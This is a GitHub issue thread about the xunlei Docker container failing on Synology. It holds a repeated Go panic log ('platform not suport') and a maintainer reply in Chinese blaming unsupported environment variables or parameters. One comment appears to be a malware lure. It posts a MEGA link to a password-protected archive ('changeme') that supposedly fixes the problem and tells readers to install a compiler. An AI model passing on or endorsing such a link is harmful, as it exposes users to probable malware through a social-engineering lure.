### ISSUE TITLE
容器启动失败

### ISSUE THREAD

**Issue by senlinmuvs** [cnk3x/xunlei#190]
```
09/29 10:21:14 WRN [xunlei-pan-cli] > loadHistory ReadFile err:read /xunlei/data/.drive/bin/.history: is a directory path:/xunlei/data/.drive/bin/.history
09/29 10:21:14 WRN [xunlei-pan-cli] > KillDrivePid ioutil.ReadFile err:open /var/packages/pan-xunlei-com/target/var/pan-xunlei-com.pid.child: no such file or directory
09/29 10:21:14 INF [xunlei-pan-cli] > kill process error:open /var/packages/pan-xunlei-com/target/var/pan-xunlei-com.pid.child: no such file or directory
09/29 10:21:15 WRN [xunlei-pan-cli] > DetectPlatform err:synology not suport docker name:synology
09/29 10:21:15 WRN [xunlei-pan-cli] panic: platform not suport:
09/29 10:21:15 WRN [xunlei-pan-cli]
09/29 10:21:15 WRN [xunlei-pan-cli] goroutine 1 [running]:
09/29 10:21:15 WRN [xunlei-pan-cli] gitlab.xunlei.cn/xlppc/pan-cli/pkg/platformdetect.Platform()
09/29 10:21:15 WRN [xunlei-pan-cli]     /xunlei-pan-cli/pkg/platformdetect/detect.go:47 +0x3e9
09/29 10:21:15 WRN [xunlei-pan-cli] gitlab.xunlei.cn/xlppc/pan-cli/pkg/oauth2client.init.0()
09/29 10:21:15 WRN [xunlei-pan-cli]     /xunlei-pan-cli/pkg/oauth2client/algorithms.go:8324 +0xf11
09/29 10:21:15 WRN [xunlei-pan-cli] report log {"fields":{"error":"exit status 2","panic":"panic: platform not suport:\n\ngoroutine 1 [running]:\ngitlab.xunlei.cn/xlppc/pan-cli/pkg/platformdetect.Platform()\n\t/xunlei-pan-cli/pkg/platformdetect/detect.go:47 +0x3e9\ngitlab.xunlei.cn/xlppc/pan-cli/pkg/oauth2client.init.0()\n\t/xunlei-pan-cli/pkg/oauth2client/algorithms.go:8324 +0xf11\n","report_type":"launcher"}}
09/29 10:21:15 WRN [xunlei-pan-cli]
09/29 10:21:15 WRN [xunlei-pan-cli] [panCliPid=22] > Launcher.startVersion cmd.Run exit error err:exit status 2 panCliPath:/xunlei/data/.drive/bin/xunlei-pan-cli.3.21.0.amd64 StdErr:panic: platform not suport:09/29 10:21:15 WRN [xunlei-pan-cli]
09/29 10:21:15 WRN [xunlei-pan-cli] goroutine 1 [running]:
09/29 10:21:15 WRN [xunlei-pan-cli] gitlab.xunlei.cn/xlppc/pan-cli/pkg/platformdetect.Platform()
09/29 10:21:15 WRN [xunlei-pan-cli]     /xunlei-pan-cli/pkg/platformdetect/detect.go:47 +0x3e9
09/29 10:21:15 WRN [xunlei-pan-cli] gitlab.xunlei.cn/xlppc/pan-cli/pkg/oauth2client.init.0()
09/29 10:21:15 WRN [xunlei-pan-cli]     /xunlei-pan-cli/pkg/oauth2client/algorithms.go:8324 +0xf11
09/29 10:21:15 WRN [xunlei-pan-cli]  repErr:exit status 2
09/29 10:21:15 WRN [xunlei-pan-cli] > start new version 3.21.0=>3.21.0 err:exit status 2
09/29 10:21:15 INF [xunlei-pan-cli] > launcher version error exit status 2 retry 1
09/29 10:21:15 WRN [xunlei-pan-cli] [panCliPid=22&report=true] > CheckProcess Signal err:os: process already finished
09/29 10:21:35 WRN [xunlei-pan-cli] > KillDrivePid ioutil.ReadFile err:open /var/packages/pan-xunlei-com/target/var/pan-xunlei-com.pid.child: no such file or directory
09/29 10:21:35 INF [xunlei-pan-cli] > kill process error:open /var/packages/pan-xunlei-com/target/var/pan-xunlei-com.pid.child: no such file or directory
09/29 10:21:35 WRN [xunlei-pan-cli] > DetectPlatform err:synology not suport docker name:synology
09/29 10:21:35 WRN [xunlei-pan-cli] panic: platform not suport:
09/29 10:21:35 WRN [xunlei-pan-cli]
09/29 10:21:35 WRN [xunlei-pan-cli] goroutine 1 [running]:
09/29 10:21:35 WRN [xunlei-pan-cli] gitlab.xunlei.cn/xlppc/pan-cli/pkg/platformdetect.Platform()
09/29 10:21:35 WRN [xunlei-pan-cli]     /xunlei-pan-cli/pkg/platformdetect/detect.go:47 +0x3e9
09/29 10:21:35 WRN [xunlei-pan-cli] gitlab.xunlei.cn/xlppc/pan-cli/pkg/oauth2client.init.0()
09/29 10:21:35 WRN [xunlei-pan-cli]     /xunlei-pan-cli/pkg/oauth2client/algorithms.go:8324 +0xf11
09/29 10:21:35 WRN [xunlei-pan-cli] report log {"fields":{"error":"exit status 2","panic":"panic: platform not suport:\n\ngoroutine 1 [running]:\ngitlab.xunlei.cn/xlppc/pan-cli/pkg/platformdetect.Platform()\n\t/xunlei-pan-cli/pkg/platformdetect/detect.go:47 +0x3e9\ngitlab.xunlei.cn/xlppc/pan-cli/pkg/oauth2client.init.0()\n\t/xunlei-pan-cli/pkg/oauth2client/algorithms.go:8324 +0xf11\n","report_type":"launcher"}}
09/29 10:21:35 WRN [xunlei-pan-cli]
09/29 10:21:35 WRN [xunlei-pan-cli] [panCliPid=31] > Launcher.startVersion cmd.Run exit error err:exit status 2 panCliPath:/xunlei/data/.drive/bin/xunlei-pan-cli.3.21.0.amd64 StdErr:panic: platform not suport:09/29 10:21:35 WRN [xunlei-pan-cli]
09/29 10:21:35 WRN [xunlei-pan-cli] goroutine 1 [running]:
09/29 10:21:35 WRN [xunlei-pan-cli] gitlab.xunlei.cn/xlppc/pan-cli/pkg/platformdetect.Platform()
09/29 10:21:35 WRN [xunlei-pan-cli]     /xunlei-pan-cli/pkg/platformdetect/detect.go:47 +0x3e9
09/29 10:21:35 WRN [xunlei-pan-cli] gitlab.xunlei.cn/xlppc/pan-cli/pkg/oauth2client.init.0()
```

**Comment by SagarChandra07** [comment]
This might help:This file might fix it

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by cnk3x** [comment]
not suport docker, 你添加了不该添加的环境变量或者参数。
